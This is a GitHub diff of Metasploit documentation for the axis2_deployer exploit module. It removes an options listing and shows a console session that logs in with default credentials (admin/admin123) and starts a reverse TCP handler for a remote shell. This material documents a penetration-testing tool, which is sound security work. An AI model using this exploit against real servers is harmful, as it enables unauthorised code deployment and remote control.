File tree Expand file tree Collapse file tree 1 file changed +0
-22
lines changed
documentation/modules/exploit/multi/http Expand file tree Collapse file tree 1 file changed +0
-22
lines changed Original file line number Diff line number Diff line change @@ -29,28 +29,6 @@ msf exploit(axis2_deployer) > set USERNAME admin
29
29
USERNAME => admin
30
30
msf exploit(axis2_deployer) > set PASSWORD admin123
31
31
PASSWORD => admin123
32
- msf exploit(axis2_deployer) > show options
33
-
34
- Module options (exploit/multi/http/axis2_deployer):
35
-
36
- Name Current Setting Required Description
37
- ---- --------------- -------- -----------
38
- PASSWORD admin123 no The password for the specified username
39
- PATH /axis2 yes The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
40
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
41
- RHOST 10.10.155.37 yes The target address
42
- RPORT 8080 yes The target port
43
- SSL false no Negotiate SSL/TLS for outgoing connections
44
- USERNAME admin no The username to authenticate as
45
- VHOST no HTTP server virtual host
46
-
47
-
48
- Exploit target:
49
-
50
- Id Name
51
- -- ----
52
- 0 Java
53
-
54
32
msf exploit(axis2_deployer) > exploit
55
33
56
34
[*] Started reverse TCP handler on 10.10.155.39:4444
You can’t perform that action at this time.
0 commit comments